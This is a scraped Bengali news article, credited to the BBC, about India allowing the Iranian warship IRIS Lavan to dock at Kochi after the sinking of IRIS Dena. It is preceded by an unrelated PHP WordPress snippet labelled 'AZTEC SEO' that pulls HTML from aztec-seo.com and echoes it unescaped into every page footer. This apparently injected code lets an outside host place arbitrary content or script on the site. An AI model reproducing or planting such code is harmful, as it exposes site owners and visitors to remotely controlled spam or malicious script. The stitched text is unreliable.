/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99);
ইরানের যুদ্ধজাহাজ আইআরআইএস লাভানকে কোচি বন্দরে প্রবেশের অনুমতি দিয়েছে ভারত।
গত চৌঠা মার্চ ভারত মহাসাগরে আমেরিকার সাবমেরিন থেকে টর্পেডো হামলায় ডুবে যায় ইরানের যুদ্ধজাহাজ আইআরআইএস দেনা। আইআরআইএস লাভানও দেনার মতো বিশাখাপট্টনমে ইন্টারন্যাশনাল ফ্লিট রিভিউ ২০২৬-এর যৌথ মহড়ায় অংশ নিতে এসেছিল।
অবজার্ভার ফাউন্ডেশন ও ভারতের পররাষ্ট্র মন্ত্রণালয়ের যৌথভাবে আয়োজিত ‘রাইসিনা ডায়লগ প্রোগ্রাম’-এ ভারতের পররাষ্ট্রমন্ত্রী এস জয়শঙ্কর বিবৃতি দিয়ে জানিয়েছেন, শ্রীলঙ্কার দক্ষিণে আইআরআইএস দেনা জাহাজে আক্রমণের ঘটনার কয়েকদিন আগে ইরান ভারতের সাথে যোগাযোগ করে আইআরআইএস লাভানে প্রযুক্তিগত সমস্যার কথা জানিয়েছিল।
২৮শে ফেব্রুয়ারি জাহাজটিকে ‘যত তাড়াতাড়ি সম্ভব’ বন্দরে প্রবেশের অনুমতি চেয়ে ভারতকে অনুরোধ করেছিল ইরান। এই অনুরোধে সাড়া দিয়ে পয়লা মার্চ কেরালার কোচি বন্দরে আইআরআইএস লাভানকে নোঙর করার অমনুমতি দেয় ভারত।
ওই জাহাজের ১৮৩ জন ক্রু বর্তমানে কোচিতেই অবস্থান করছেন।
অন্যদিকে দ্য ইন্ডিয়ান এক্সপ্রেসে প্রকাশিত প্রতিবেদনে ভারত সরকারের সূত্র উল্লেখ করে জানানো হয়েছে, ইরানে যুদ্ধবস্থার অবনতির দিকে তাকিয়ে আইআরআইএস দেনাকেও ভারতে আশ্রয়ের আমন্ত্রণ জানিয়েছিল ভারত সরকার। যদিও এই অমন্ত্রণের কোনো উত্তর ইরান থেকে আসেনি। সূত্র: বিবিসি